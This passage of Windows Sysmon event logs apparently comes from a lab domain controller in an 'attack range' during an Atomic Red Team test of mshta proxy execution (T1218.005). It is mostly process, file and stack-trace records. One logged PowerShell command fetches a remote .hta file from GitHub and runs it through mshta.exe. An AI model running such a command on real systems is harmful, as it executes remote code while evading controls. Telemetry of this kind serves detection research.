ow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+4960635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+495f82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49631471(wow64) 154100x800000000000000028920Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.966{7901BC46-53CF-6008-9B06-00000000A301}6188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Invoke-ATHHTMLApplication -HTAUri https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta -MSHTAFilePath $env:windir\system32\mshta.exe} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000028919Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.956{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-01-20 16:01:19.956 11241100x800000000000000028918Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.956{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-01-20 16:01:19.956 11241100x800000000000000028917Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.localDLL2021-01-20 16:01:19.363{7901BC46-53CF-6008-9906-00000000A301}6432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\zh1ejr54\zh1ejr54.dll2021-01-20 16:01:19.191 10341000x800000000000000028916Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.363{7901BC46-4FA9-6008-4405-00000000A301}70003220C:\Windows\system32\conhost.exe{7901BC46-53CF-6008-9A06-00000000A301}1456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028915Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.363{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028914Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.363{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028913Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.363{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028912Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.363{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028911Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.363{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-53CF-6008-9A06-00000000A301}1456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028910Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.363{7901BC46-53CF-6008-9906-00000000A301}64324136C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{7901BC46-53CF-6008-9A06-00000000A301}1456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000028909Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.366{7901BC46-53CF-6008-9A06-00000000A301}1456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES4C58.tmp" "c:\Users\Administrator\AppData\Local\Temp\zh1ejr54\CSCE434D678E2A643CA9C928B5B1B145B9.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{7901BC46-53CF-6008-9906-00000000A301}6432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\zh1ejr54\zh1ejr54.cmdline" 10341000x800000000000000028908Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.191{7901BC46-4FA9-6008-4405-00000000A301}70003220C:\Windows\system32\conhost.exe{7901BC46-53CF-6008-9906-00000000A301}6432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028907Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.191{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028906Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.191{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028905Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.191{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028904Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.191{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028903Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.191{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-53CF-6008-9906-00000000A301}6432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028902Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.191{7901BC46-4FA9-6008-4305-00000000A301}74203768C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{7901BC46-53CF-6008-9906-00000000A301}6432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c18d9|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\db79b1cc2b753cce16ad58d141a194ca\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff6fa0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\db79b1cc2b753cce16ad58d141a194ca\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff6fa0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49628357(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49604130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49603e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+4a0b5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+495c4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49622e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+4960635c(wow64) 154100x800000000000000028901Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.194{7901BC46-53CF-6008-9906-00000000A301}6432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\zh1ejr54\zh1ejr54.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000028900Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.191{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\zh1ejr54\zh1ejr54.cmdline2021-01-20 16:01:19.191 11241100x800000000000000028899Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.localDLL2021-01-20 16:01:19.191{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\zh1ejr54\zh1ejr54.dll2021-01-20 16:01:19.191 10341000x800000000000000028898Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.050{7901BC46-4FA9-6008-4405-00000000A301}70003220C:\Windows\system32\conhost.exe{7901BC46-53CF-6008-9806-00000000A301}8092C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028897Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.050{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028896Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.050{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028895Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.050{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028894Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.050{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028893Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 